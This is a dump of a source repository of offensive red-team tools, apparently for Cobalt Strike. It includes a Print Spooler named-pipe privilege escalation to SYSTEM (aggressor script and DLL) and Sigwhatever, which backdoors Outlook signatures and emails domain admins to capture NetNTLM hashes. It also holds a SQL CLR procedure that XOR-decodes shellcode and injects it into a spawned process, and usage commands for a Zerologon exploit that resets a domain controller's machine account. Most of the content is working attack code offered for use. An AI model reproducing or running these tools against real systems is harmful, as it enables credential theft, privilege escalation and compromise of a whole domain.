35 | }
36 |
37 | public void Doit( string urlPrefix, string port, string logFile, string argChallenge)
38 | {
39 | string computerName = Environment.MachineName;
40 | string netbiosDomain = Environment.UserDomainName;
41 | string dnsDomain;
42 |
43 | try
44 | {
45 | dnsDomain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
46 | }
47 | catch
48 | {
49 | dnsDomain = netbiosDomain;
50 | }
51 |
52 | Regex r = new Regex("^[A-Fa-f0-9]{16}$");
53 | if (!String.IsNullOrEmpty(argChallenge) && !r.IsMatch(argChallenge))
54 | {
55 | Console.WriteLine("[ERROR] Challenge is invalid");
56 | return;
57 | }
58 |
59 | // Print all the options
60 | string version = "0.913-SW";
61 | Console.WriteLine(String.Format("[+] HTTPCap {0} started at {1}", version, DateTime.Now.ToString("s")));
62 | Console.WriteLine(String.Format("[+] Encryption Password is: " + key));
63 | if (!String.IsNullOrEmpty(argChallenge)) Console.WriteLine(String.Format("[+] HTTP NTLM Challenge = {0}", argChallenge));
64 | Console.WriteLine(String.Format("[+] HTTP Authentication = {0}", true));
65 |
66 | // Fire HttpListener thread
67 | using (HttpServer srvr = new HttpServer(5, argChallenge, computerName, dnsDomain, netbiosDomain, logFile, Convert.ToInt32(port), urlPrefix))
68 | {
69 | if (srvr.Start())
70 | while (true) { };
71 | }
72 | }
73 | }
74 | }
--------------------------------------------------------------------------------
/Tools/spoolsystem/cna/spoolsystem.cna:
--------------------------------------------------------------------------------
1 | import common.CommonUtils;
2 | import beacon.CommandBuilder;
3 | import common.ReflectiveDLL;
4 |
5 | sub SpoolTrigger {
6 | local('$bid $pipename $spawn $offset $padding $patched $dllbytes $file $builder $pid $pipenameW');
7 | $bid = $1;
8 | $pipename = $2;
9 | $method = $3;
10 |
11 | if ($method eq "spawn") {
12 | # this is to avoid cross-arch injection where possible
13 | if(binfo($bid, 'barch') eq 'x64') {
14 | bdllspawn($1, script_resource("bin/SpoolTrigger.x64.dll"), $pipename, "spooltrigger", 5000, true);
15 | }
16 | else {
17 | bdllspawn($1, script_resource("bin/SpoolTrigger.x86.dll"), $pipename, "spooltrigger", 5000, true);
18 | }
19 | }
20 | else {
21 | # patch and self-inject..
22 | # first we need to patch up our arguments
23 | # we use internal APIs since bdllinject wants a filepath not bytes
24 | if(binfo($bid, 'barch') eq 'x64') {
25 | $file = script_resource("bin/SpoolTrigger.x64.dll");
26 | }
27 | else {
28 | $file = script_resource("bin/SpoolTrigger.x86.dll");
29 | }
30 |
31 | $dllbytes = [CommonUtils readFile: $file];
32 | $padding = [CommonUtils garbage: "PATCHME"];
33 | $patched = [CommonUtils patch: $dllbytes, "PATCHME", $padding . $pipename];
34 | $offset = [ReflectiveDLL findReflectiveLoader: $dllbytes];
35 |
36 | if($offset <= 0) {
37 | berror($1, "Could not find ReflectiveLoader");
38 | return;
39 | }
40 |
41 | $pid = binfo($bid, 'pid');
42 | blog($bid, "Injecting spooltrigger into PID: " . $pid);
43 | $builder = [new CommandBuilder];
44 | if ([ReflectiveDLL is64: $dllbytes]) {
45 | [$builder setCommand: 43];
46 | } else {
47 | [$builder setCommand: 9];
48 | }
49 | [$builder addInteger: parseNumber($pid)];
50 | [$builder addInteger: $offset];
51 | [$builder addString: [CommonUtils bString: $patched]];
52 | call("beacons.task", $null, $bid, cast([$builder build], 'b'));
53 | }
54 | }
55 |
56 | sub SpoolSystem {
57 | local('$mypipe $pipename $builder')
58 | # needed for ImpersonateNamedPipeClient
59 | btask($1, "Tasked beacon to get SYSTEM via spoolss", "T1134");
60 | bgetprivs($1, "SeImpersonatePrivilege");
61 |
62 | # fire up a named pipe
63 | $mypipe = [CommonUtils garbage: "spooltrigger"];
64 | $pipename = "\\\\.\\pipe\\" . $mypipe . "\\pipe\\spoolss";
65 | $builder = [new CommandBuilder];
66 | [$builder setCommand: 60];
67 | [$builder addString: $pipename];
68 | call("beacons.task", $null, $1, cast([$builder build], 'b'));
69 |
70 | # trigger spoolss
71 | SpoolTrigger($1, $mypipe, $2);
72 |
73 | # impersonate the named pipe client
74 | [$builder setCommand: 61];
75 | call("beacons.task", $null, $1, cast([$builder build], 'b'));
76 | }
77 |
78 | beacon_command_register("spoolsystem", "Gets SYSTEM via spoolss",
79 | "Uses named pipe impersonation to gain SYSTEM via Print Spooler.\n\n" .
80 | "Use: spoolsystem \n\n" .
81 | "Example: spoolsystem inject\n" .
82 | "Example: spoolsystem spawn" );
83 |
84 | alias spoolsystem {
85 | local('$args');
86 | $args = substr($0, strlen("spoolsystem "));
87 |
88 | if ($args eq "") {
89 | berror($1, "Please specify an execution method.");
90 | return;
91 | }
92 | SpoolSystem($1, $args);
93 | }
--------------------------------------------------------------------------------
/Tools/Sigwhatever/README.md:
--------------------------------------------------------------------------------
1 | # Sigwhatever
2 | For automated exploitation of netntlm hash capture via image tags in emails signatures. This targets Outlook specifically and will insert a 1x1px image into an existing signature block, or create a new signature as required. A listener is then started to capture authentication attempts that happen as a result of sent emails being viewed by other users.
3 |
4 | The tool borrows code from the Seatbelt and Inveigh projects - features are:
5 |
6 | * Queries the firewall for suitable ports to listen on (Uses some seatbelt code)
7 | * Cross references HttpQueryServiceConfiguration for any usable URL ACLs
8 | * TCP/HTTP server and hash capture (Uses Inveigh code)
9 | * Signature Detection (to modify the appropriate registry settings and signatures)
10 | * Modification of Signature
11 | * Feature to send mail to specific group (e.g. domain admins)
12 | * Option to create encrypted logs on disk
13 | * Cleanup (Reverts changes in signature settings and existing signature)
14 |
15 | ---
16 |
17 | ## TL;DR
18 |
19 | run:
20 |
21 | `execute-assembly sigwhatever.exe AUTO`
22 |
23 | Then when you're finished, run:
24 |
25 | `execute-assembly sigwhatever.exe CLEANUP`
26 |
27 | Bear in mind that even running jobkill on the .net job does not seem to kill the spawned process.
28 |
29 | ---
30 | ## Usage
31 |
32 | `SigWhatever.exe [OPTIONS]+ operation`
33 |
34 |
35 | ### OPTIONS:
36 | ```
37 | -p, --port=VALUE TCP Port.
38 | -l, --log=VALUE Log file path.
39 | -g, --group=VALUE Target Active Directory group.
40 | -f, --force Force HTTP server start.
41 | --ba, --backdoor-all Backdoor all signatures.
42 | -c, --challenge=VALUE NTLM Challenge (in hex).
43 | -u, --url-prefix=VALUE URL Prefix. e.g. /MDEServer/test
44 | -h, --help Show this message and exit.
45 | ```
46 |
47 | ### OPERATIONS:
48 |
49 | - **AUTO**: Just do everything for me - backdoor the signature and start the listener on this box.
50 | _Usage_: `SigWhatever.exe AUTO`
51 |
52 | - **CHECKTRUST**: Check whether the trust zone settings - if the domain isn't in there then this probably won't work.
53 | _Usage_: `SigWhatever.exe CHECKTRUST`
54 |
55 | - **CHECKFW**: Check whether the host based firewall is on and whether there's an exception for the chosen port.
56 | _Usage_: `SigWhatever.exe CHECKFW -p `
57 |
58 | - **SIGNATURE**: Hijack the current user's signature, or add a new one via registry changes.
59 | _Usage_: `SigWhatever.exe SIGNATURE -p -l -u --backdoor-all --force`
60 | _Note_: If `--backdoor-all` is not specified then the tool will attempt to get the current signature from Outlook - this may cause a popup for the user if their AV is outdated.
61 |
62 | - **SIGNOLISTEN**: Hijack the current user's signature, or add a new one via registry changes.
63 | _Usage_: `SigWhatever.exe SIGNOLISTEN -s -p -l --backdoor-all>`
64 |
65 | - **CLEANUP**: Remove any modifications to the registry or htm signature files.
66 | _Usage_: `SigWhatever.exe CLEANUP`
67 |
68 | - **EMAILADMINS**: Enumerate email addresses from an AD group and send them a 'blank' email with the payload.
69 | _Usage_: `SigWhatever.exe EMAILADMINS -g -p -l --force`
70 |
71 | - **LISTENONLY**: Just start the listener - make sure it's on the same port.
72 | _Usage_: `SigWhatever.exe LISTENONLY -p -l `
73 |
74 | - **SHOWACLS**: List all URL Reservation ACLs with User, Everyone or Authenticated Users permissions.
75 | _Usage_: `SigWhatever.exe SHOWACLS`
76 |
77 |
78 | ## Authors:
79 | - David Cash
80 | - Rich Warren
81 | - Julian Storr
82 |
--------------------------------------------------------------------------------
/Tools/Squeak/Home.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
43 |
44 | Raw Bin
45 |
46 |
47 | Server
48 |
49 |
50 | Port
51 |
52 |
53 | Database
54 |
55 |
56 | Username
57 |
58 |
59 | Password
60 |
61 |
62 | Debug Output
63 |
64 |
65 |
66 | Authenticate as current Windows identity
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ms-rprn.idl:
--------------------------------------------------------------------------------
1 | // https://github.com/leechristensen/SpoolSample/blob/master/MS-RPRN/ms-rprn.idl
2 | // [MS-RPRN] interface
3 | [
4 | uuid(12345678-1234-ABCD-EF00-0123456789AB),
5 | version(1.0),
6 | ms_union,
7 | endpoint("ncacn_np:[\\pipe\\spoolss]"),
8 | pointer_default(unique)
9 | ]
10 |
11 | interface winspool {
12 |
13 | import "oaidl.idl";
14 |
15 | #if __midl < 700
16 | #define disable_consistency_check
17 | #endif
18 | // [MS-RPRN] common info container structures
19 | typedef struct _DEVMODE_CONTAINER {
20 | DWORD cbBuf;
21 | [size_is(cbBuf), unique] BYTE* pDevMode;
22 | } DEVMODE_CONTAINER;
23 |
24 | typedef struct _RPC_V2_NOTIFY_OPTIONS_TYPE {
25 | unsigned short Type;
26 | unsigned short Reserved0;
27 | DWORD Reserved1;
28 | DWORD Reserved2;
29 | DWORD Count;
30 | [size_is(Count), unique] unsigned short* pFields;
31 | } RPC_V2_NOTIFY_OPTIONS_TYPE;
32 |
33 | typedef struct _RPC_V2_NOTIFY_OPTIONS {
34 | DWORD Version;
35 | DWORD Reserved;
36 | DWORD Count;
37 | [size_is(Count), unique] RPC_V2_NOTIFY_OPTIONS_TYPE* pTypes;
38 | } RPC_V2_NOTIFY_OPTIONS;
39 |
40 | // [MS-RPRN] common data types
41 | typedef unsigned short LANGID;
42 | typedef [context_handle] void* GDI_HANDLE;
43 | typedef [context_handle] void* PRINTER_HANDLE;
44 | typedef [handle] wchar_t* STRING_HANDLE;
45 |
46 | // [MS-RPRN] methods
47 | DWORD RpcEnumPrinters();
48 | DWORD RpcOpenPrinter(
49 | [in, string, unique] STRING_HANDLE pPrinterName,
50 | [out] PRINTER_HANDLE* pHandle,
51 | [in, string, unique] wchar_t* pDatatype,
52 | [in] DEVMODE_CONTAINER* pDevModeContainer,
53 | [in] DWORD AccessRequired
54 | );
55 | DWORD RpcSetJob();
56 | DWORD RpcGetJob();
57 | DWORD RpcEnumJobs();
58 | DWORD RpcAddPrinter();
59 | DWORD RpcDeletePrinter();
60 | DWORD RpcSetPrinter();
61 | DWORD RpcGetPrinter();
62 | DWORD RpcAddPrinterDriver();
63 | DWORD RpcEnumPrinterDrivers();
64 | DWORD RpcGetPrinterDriver();
65 | DWORD RpcGetPrinterDriverDirectory();
66 | DWORD RpcDeletePrinterDriver();
67 | DWORD RpcAddPrintProcessor();
68 | DWORD RpcEnumPrintProcessors();
69 | DWORD RpcGetPrintProcessorDirectory();
70 | DWORD RpcStartDocPrinter();
71 | DWORD RpcStartPagePrinter();
72 | DWORD RpcWritePrinter();
73 | DWORD RpcEndPagePrinter();
74 | DWORD RpcAbortPrinter();
75 | DWORD RpcReadPrinter();
76 | DWORD RpcEndDocPrinter();
77 | DWORD RpcAddJob();
78 | DWORD RpcScheduleJob();
79 | DWORD RpcGetPrinterData();
80 | DWORD RpcSetPrinterData();
81 | DWORD RpcWaitForPrinterChange();
82 | DWORD RpcClosePrinter(
83 | [in, out] PRINTER_HANDLE* phPrinter
84 | );
85 | DWORD RpcAddForm();
86 | DWORD RpcDeleteForm();
87 | DWORD RpcGetForm();
88 | DWORD RpcSetForm();
89 | DWORD RpcEnumForms();
90 | DWORD RpcEnumPorts();
91 | DWORD RpcEnumMonitors();
92 | void Opnum37NotUsedOnWire();
93 | void Opnum38NotUsedOnWire();
94 | DWORD RpcDeletePort();
95 | DWORD RpcCreatePrinterIC();
96 | DWORD RpcPlayGdiScriptOnPrinterIC();
97 | DWORD RpcDeletePrinterIC();
98 | void Opnum43NotUsedOnWire();
99 | void Opnum44NotUsedOnWire();
100 | void Opnum45NotUsedOnWire();
101 | DWORD RpcAddMonitor();
102 | DWORD RpcDeleteMonitor();
103 | DWORD RpcDeletePrintProcessor();
104 | void Opnum49NotUsedOnWire();
105 | void Opnum50NotUsedOnWire();
106 | DWORD RpcEnumPrintProcessorDatatypes();
107 | DWORD RpcResetPrinter();
108 | DWORD RpcGetPrinterDriver2();
109 | void Opnum54NotUsedOnWire();
110 | void Opnum55NotUsedOnWire();
111 | DWORD RpcFindClosePrinterChangeNotification();
112 | void Opnum57NotUsedOnWire();
113 | DWORD RpcReplyOpenPrinter();
114 | DWORD RpcRouterReplyPrinter();
115 | DWORD RpcReplyClosePrinter();
116 | DWORD RpcAddPortEx();
117 | DWORD RpcRemoteFindFirstPrinterChangeNotification();
118 | void Opnum63NotUsedOnWire();
119 | void Opnum64NotUsedOnWire();
120 | DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(
121 | [in] PRINTER_HANDLE hPrinter,
122 | [in] DWORD fdwFlags,
123 | [in] DWORD fdwOptions,
124 | [in, string, unique] wchar_t* pszLocalMachine,
125 | [in] DWORD dwPrinterLocal,
126 | [in, unique] RPC_V2_NOTIFY_OPTIONS* pOptions
127 | );
128 | }
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Crypto.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Security.Cryptography;
4 | using System.Text;
5 |
6 | namespace Sigwhatever
7 | {
8 | public class Crypto
9 | {
10 | #region Settings
11 | private static int _iterations = 2;
12 | private static int _keySize = 256;
13 | private static string _hash = "SHA1";
14 | private static string _salt = "asvlraaa38490a31"; // Random
15 | private static string _vector = "8947ar34avl34kjw"; // Random
16 | #endregion
17 |
18 | public string Encrypt(string value, string password)
19 | {
20 | return Encrypt(value, password);
21 | }
22 |
23 | public string Encrypt(string value, string password)
24 | where T : SymmetricAlgorithm, new()
25 | {
26 | byte[] vectorBytes = Encoding.ASCII.GetBytes(_vector);
27 | byte[] saltBytes = Encoding.ASCII.GetBytes(_salt);
28 | byte[] valueBytes = Encoding.ASCII.GetBytes(value);
29 |
30 | byte[] encrypted;
31 | using (T cipher = new T())
32 | {
33 | PasswordDeriveBytes _passwordBytes =
34 | new PasswordDeriveBytes(password, saltBytes, _hash, _iterations);
35 | byte[] keyBytes = _passwordBytes.GetBytes(_keySize / 8);
36 |
37 | cipher.Mode = CipherMode.CBC;
38 |
39 | using (ICryptoTransform encryptor = cipher.CreateEncryptor(keyBytes, vectorBytes))
40 | {
41 | using (MemoryStream to = new MemoryStream())
42 | {
43 | using (CryptoStream writer = new CryptoStream(to, encryptor, CryptoStreamMode.Write))
44 | {
45 | writer.Write(valueBytes, 0, valueBytes.Length);
46 | writer.FlushFinalBlock();
47 | encrypted = to.ToArray();
48 | }
49 | }
50 | }
51 | cipher.Clear();
52 | }
53 | return Convert.ToBase64String(encrypted);
54 | }
55 |
56 | public string Decrypt(string value, string password)
57 | {
58 | return Decrypt(value, password);
59 | }
60 |
61 | public string Decrypt(string value, string password) where T : SymmetricAlgorithm, new()
62 | {
63 | byte[] vectorBytes = Encoding.ASCII.GetBytes(_vector);
64 | byte[] saltBytes = Encoding.ASCII.GetBytes(_salt);
65 | byte[] valueBytes = Convert.FromBase64String(value);
66 |
67 | byte[] decrypted;
68 | int decryptedByteCount = 0;
69 |
70 | using (T cipher = new T())
71 | {
72 | PasswordDeriveBytes _passwordBytes = new PasswordDeriveBytes(password, saltBytes, _hash, _iterations);
73 | byte[] keyBytes = _passwordBytes.GetBytes(_keySize / 8);
74 |
75 | cipher.Mode = CipherMode.CBC;
76 |
77 | try
78 | {
79 | using (ICryptoTransform decryptor = cipher.CreateDecryptor(keyBytes, vectorBytes))
80 | {
81 | using (MemoryStream from = new MemoryStream(valueBytes))
82 | {
83 | using (CryptoStream reader = new CryptoStream(from, decryptor, CryptoStreamMode.Read))
84 | {
85 | decrypted = new byte[valueBytes.Length];
86 | decryptedByteCount = reader.Read(decrypted, 0, decrypted.Length);
87 | }
88 | }
89 | }
90 | }
91 | catch (Exception)
92 | {
93 | return String.Empty;
94 | }
95 | cipher.Clear();
96 | }
97 | return Encoding.UTF8.GetString(decrypted, 0, decryptedByteCount);
98 | }
99 | }
100 | }
101 |
--------------------------------------------------------------------------------
/Tools/Squeak/clrcode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data;
3 | using System.Data.SqlClient;
4 | using System.Data.SqlTypes;
5 | using Microsoft.SqlServer.Server;
6 | using System.Net;
7 | using System.Runtime.InteropServices;
8 | using System.Diagnostics;
9 | using System.Text;
10 |
11 | public partial class StoredProcedures
12 | {
13 | [Microsoft.SqlServer.Server.SqlProcedure]
14 | public static void runner ()
15 | {
16 | SqlPipe sqlPipeLine = SqlContext.Pipe;
17 | sqlPipeLine.Send(DateTime.UtcNow.ToString());
18 |
19 |
20 | Exec();
21 |
22 |
23 |
24 | }
25 |
26 | public static byte[] exclusiveOR(byte[] arr1, byte[] arr2)
27 | {
28 |
29 |
30 | byte[] result = new byte[arr1.Length];
31 |
32 | for (int i = 0; i < arr1.Length; ++i)
33 | result[i] = (byte)(arr1[i] ^ arr2[0]);
34 |
35 | return result;
36 | }
37 |
38 | public static string ByteArrayToString(byte[] ba)
39 | {
40 | StringBuilder hex = new StringBuilder(ba.Length * 2);
41 | foreach (byte b in ba)
42 | hex.AppendFormat("{0:x2}", b);
43 | return hex.ToString();
44 | }
45 |
46 | public static byte[] StringToByteArray(string hex)
47 | {
48 | if (hex.Length % 2 == 1)
49 | throw new Exception("The binary key cannot have an odd number of digits");
50 |
51 | byte[] arr = new byte[hex.Length >> 1];
52 |
53 | for (int i = 0; i < hex.Length >> 1; ++i)
54 | {
55 | arr[i] = (byte)((GetHexVal(hex[i << 1]) << 4) + (GetHexVal(hex[(i << 1) + 1])));
56 | }
57 |
58 | return arr;
59 | }
60 | public static int GetHexVal(char hex)
61 | {
62 | int val = (int)hex;
63 |
64 | return val - (val < 58 ? 48 : (val < 97 ? 55 : 87));
65 | }
66 |
67 | [DllImport("kernel32.dll")]
68 | public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
69 |
70 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
71 | public static extern IntPtr GetModuleHandle(string lpModuleName);
72 |
73 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
74 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
75 |
76 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
77 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
78 |
79 | [DllImport("kernel32.dll", SetLastError = true)]
80 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
81 |
82 | [DllImport("kernel32.dll")]
83 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
84 |
85 | public static void Exec()
86 | {
87 |
88 | var p = new Process();
89 | //Spawnto binary
90 | p.StartInfo.FileName = "mspaint.exe";
91 |
92 | p.Start();
93 |
94 | try
95 | {
96 | var procId = p.Id;
97 | Console.WriteLine("ID: " + procId);
98 | }
99 | catch(Exception e)
100 | {
101 |
102 | }
103 |
104 |
105 | Process targetProcess;
106 |
107 | try
108 | {
109 | targetProcess = Process.GetProcessById(p.Id);
110 | }
111 | catch
112 | {
113 | System.Console.WriteLine("Process not found!");
114 | return;
115 | }
116 |
117 | // Get process handler
118 | IntPtr process_handle = OpenProcess(0x1F0FFF, false, targetProcess.Id);
119 |
120 |
121 | string h = "[HEX]";
122 | byte[] k = new byte[] { 0xDE };
123 | byte[] shellcode = exclusiveOR(StringToByteArray(h), k);
124 |
125 | // Allocate a memory space in target process, big enough to store the shellcode
126 | IntPtr memory_allocation_variable = VirtualAllocEx(process_handle, IntPtr.Zero, (uint)(shellcode.Length), 0x00001000, 0x40);
127 |
128 | // Write the shellcode
129 | UIntPtr bytesWritten;
130 | WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, (uint)(shellcode.Length), out bytesWritten);
131 |
132 | // Create a thread that will call LoadLibraryA with allocMemAddress as argument
133 | if (CreateRemoteThread(process_handle, IntPtr.Zero, 0, memory_allocation_variable, IntPtr.Zero, 0, IntPtr.Zero) != IntPtr.Zero)
134 | {
135 | Console.Write("done!");
136 | }
137 | else
138 | {
139 | Console.Write("failed!");
140 | }
141 | }
142 |
143 | }
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "ms-rprn_h.h"
5 | #include "ReflectiveLoader.h"
6 | #include "patch.h"
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #pragma comment(lib, "rpcrt4.lib")
13 |
14 | extern HINSTANCE hAppInstance;
15 |
16 | DWORD WINAPI TriggerNamedPipeConnection(LPWSTR lpParam)
17 | {
18 | HRESULT hr = NULL;
19 | PRINTER_HANDLE hPrinter = NULL;
20 | DEVMODE_CONTAINER devmodeContainer = { 0 };
21 |
22 | LPWSTR pwszComputerName = NULL;
23 | DWORD dwComputerNameLen = MAX_COMPUTERNAME_LENGTH + 1;
24 |
25 | LPWSTR pwszTargetServer = NULL;
26 | LPWSTR pwszCaptureServer = NULL;
27 |
28 | LPWSTR pwszPipeName = lpParam;
29 |
30 | pwszComputerName = (LPWSTR)malloc(dwComputerNameLen * sizeof(WCHAR));
31 | if (!pwszComputerName)
32 | goto cleanup;
33 |
34 | if (!GetComputerName(pwszComputerName, &dwComputerNameLen))
35 | goto cleanup;
36 |
37 | pwszTargetServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
38 | if (!pwszTargetServer)
39 | goto cleanup;
40 |
41 | pwszCaptureServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
42 | if (!pwszCaptureServer)
43 | goto cleanup;
44 |
45 | StringCchPrintf(pwszTargetServer, MAX_PATH, L"\\\\%ws", pwszComputerName);
46 | StringCchPrintf(pwszCaptureServer, MAX_PATH, L"\\\\%ws/pipe/%ws", pwszComputerName, pwszPipeName);
47 |
48 | RpcTryExcept
49 | {
50 | if (RpcOpenPrinter(pwszTargetServer, &hPrinter, NULL, &devmodeContainer, 0) == RPC_S_OK)
51 | {
52 | RpcRemoteFindFirstPrinterChangeNotificationEx(hPrinter, PRINTER_CHANGE_ADD_JOB, 0, pwszCaptureServer, 0, NULL);
53 | RpcClosePrinter(&hPrinter);
54 | wprintf(L"[+] Triggered named pipe connection to %ls\n", pwszCaptureServer);
55 | }
56 | }
57 | RpcExcept(EXCEPTION_EXECUTE_HANDLER);
58 | {
59 | // Expect RPC_S_SERVER_UNAVAILABLE
60 | }
61 | RpcEndExcept;
62 |
63 | cleanup:
64 | if (pwszComputerName)
65 | free(pwszComputerName);
66 | if (pwszTargetServer)
67 | free(pwszTargetServer);
68 | if (pwszCaptureServer)
69 | free(pwszCaptureServer);
70 | if (hPrinter)
71 | RpcClosePrinter(&hPrinter);
72 |
73 | return 0;
74 | }
75 |
76 | handle_t __RPC_USER STRING_HANDLE_bind(STRING_HANDLE lpStr)
77 | {
78 | RPC_STATUS RpcStatus;
79 | RPC_WSTR StringBinding;
80 | handle_t BindingHandle;
81 |
82 | if (RpcStringBindingComposeW((RPC_WSTR)L"12345678-1234-ABCD-EF00-0123456789AB", (RPC_WSTR)L"ncacn_np", (RPC_WSTR)lpStr, (RPC_WSTR)L"\\pipe\\spoolss", NULL, &StringBinding) != RPC_S_OK)
83 | return NULL;
84 |
85 | RpcStatus = RpcBindingFromStringBindingW(StringBinding, &BindingHandle);
86 |
87 | RpcStringFreeW(&StringBinding);
88 |
89 | if (RpcStatus != RPC_S_OK)
90 | return NULL;
91 |
92 | return BindingHandle;
93 | }
94 |
95 | void __RPC_USER STRING_HANDLE_unbind(STRING_HANDLE lpStr, handle_t BindingHandle)
96 | {
97 | RpcBindingFree(&BindingHandle);
98 | }
99 |
100 | void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
101 | {
102 | return((void __RPC_FAR*) malloc(cBytes));
103 | }
104 |
105 | void __RPC_USER midl_user_free(void __RPC_FAR* p)
106 | {
107 | free(p);
108 | }
109 |
110 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
111 | {
112 | BOOL bReturnValue = TRUE;
113 | LPWSTR pwszParams = NULL;
114 | size_t convertedChars = 0;
115 | size_t newsize = 0;
116 | char* args = NULL;
117 |
118 | switch (dwReason)
119 | {
120 | case DLL_QUERY_HMODULE:
121 | if (lpReserved != NULL)
122 | *(HMODULE*)lpReserved = hAppInstance;
123 | break;
124 | case DLL_PROCESS_ATTACH:
125 | hAppInstance = hinstDLL;
126 | if (lpReserved != NULL) {
127 | // Process arguments
128 | pwszParams = (LPWSTR)calloc(strlen((LPSTR)lpReserved) + 1, sizeof(WCHAR));
129 | newsize = strlen((LPSTR)lpReserved) + 1;
130 | mbstowcs_s(&convertedChars, pwszParams, newsize, (LPSTR)lpReserved, _TRUNCATE);
131 | TriggerNamedPipeConnection(pwszParams);
132 | fflush(stdout);
133 | ExitProcess(0);
134 | }
135 | else {
136 | args = (char*)patchme + 7;
137 | if (args[0] != '\0') {
138 | // Load from patched args
139 | pwszParams = (LPWSTR)calloc(strlen((LPSTR)args) + 1, sizeof(WCHAR));
140 | newsize = strlen((LPSTR)args) + 1;
141 | mbstowcs_s(&convertedChars, pwszParams, newsize, (LPSTR)args, _TRUNCATE);
142 | TriggerNamedPipeConnection(pwszParams);
143 | }
144 | }
145 | break;
146 | case DLL_PROCESS_DETACH:
147 | case DLL_THREAD_ATTACH:
148 | case DLL_THREAD_DETACH:
149 | break;
150 | }
151 | return bReturnValue;
152 | }
153 |
154 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/README.md:
--------------------------------------------------------------------------------
1 | # SharpZeroLogon
2 |
3 | This is an exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass. Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise.
4 |
5 | The vulnerability was discovered by Tom Tervoort of Secura BV, and was addressesd by Microsoft on August 11th 2020. You can read more about the vulnerability in [their excellent whitepaper](https://www.secura.com/blog/zero-logon).
6 |
7 | Although other exploits exist, this tool is aimed at working with Cobalt Strike's `execute-assembly` functionality. Therefore it is written in C# using functions from `netapi32.dll`. The nice thing here is that due to the structures being zero by default, we do not need to mess with any packets and can use the APIs provided by Microsoft cleanly (relatively ;).
8 |
9 | # Running
10 |
11 | ## Checking if the server is vulnerable
12 |
13 | To run the exploit, from a domain joined machine (see method below for non domain-joined) run the `SharpZeroLogon.exe` binary, providing the FQDN of the Domain Controller.
14 |
15 | Running it with only one argument will test whether the target Domain Controller is vulnerable to CVE-2020-1472.
16 |
17 | In the following example, the FQDN of the Domain Controller is `win-dc01.vulncorp.local`:
18 |
19 | ```
20 | execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
21 | ```
22 |
23 | If the Domain Controller is vulnerable, you will receive a message indicating it was Successful, otherwise the server has likely been patched and is not vulnerable.
24 |
25 | ## Resetting the machine account password
26 |
27 | Firstly, it is **very important** to note that resetting the Domain Controller machine account password in this manner **will likely break functionality**. You should not do this on a production system without the system owner understanding that there may be an impact. Of course once you have reset the password, you can then carry out a dcsync (using `pth` with the machine account), and subsequently reset the password using a Domain Admin account via an [official method](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1). However, it is important to understand the potential impact in a lab environment before running it blindly.
28 |
29 | To reset the machine account, run the following command (specifying your DC FQDN):
30 |
31 | ```
32 | execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
33 | ```
34 |
35 | Once the machine account password is reset, you can use `pth` to impersonate the machine account and perform a DCSync.
36 |
37 | ## Testing from a non Domain-joined machine
38 |
39 | By default the `netapi32.dll` functions use RPC over SMB named pipe (ncacn_np), which requires an authenticated session (i.e. a domain-joined client). Benjamin Delpy (@gentilkiwi) found a way round this by patching `logoncli.dll` with a single byte patch that forces RPC over TCP/IP (ncacn_ip_tcp) instead, which he has implemented in Mimikatz. This patch allows the exploit to work from a non domain-joined client as well.
40 |
41 | To run the exploit from a non domain-joined context, use the `-patch` flag, which will force the client to use RPC over TCP/IP.
42 |
43 | For example:
44 |
45 | ```
46 | execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
47 | ```
48 |
49 | Note that the patch is designed to work on x64 clients only.
50 |
51 | ## Detection
52 |
53 | * A [sample PCAP](https://github.com/sbousseaden/PCAP-ATTACK/blob/master/Lateral%20Movement/CVE-2020-1472_Zerologon_RPC_NetLogon_NullChallenge_SecChan_6_from_nonDC_to_DC.pcapng) of a Zerologon attempt is provided by @sbousseaden.
54 | * Successful exploitation resulting in a password change will show as event ID 4742, Password last set change, performed by Anonymous Logon.
55 | * Adam Swan of SOC Prime provides a [Sigma rule](https://socprime.com/blog/zerologon-attack-detection-cve-2020-1472/) which can be used to detect Zerologon attempts.
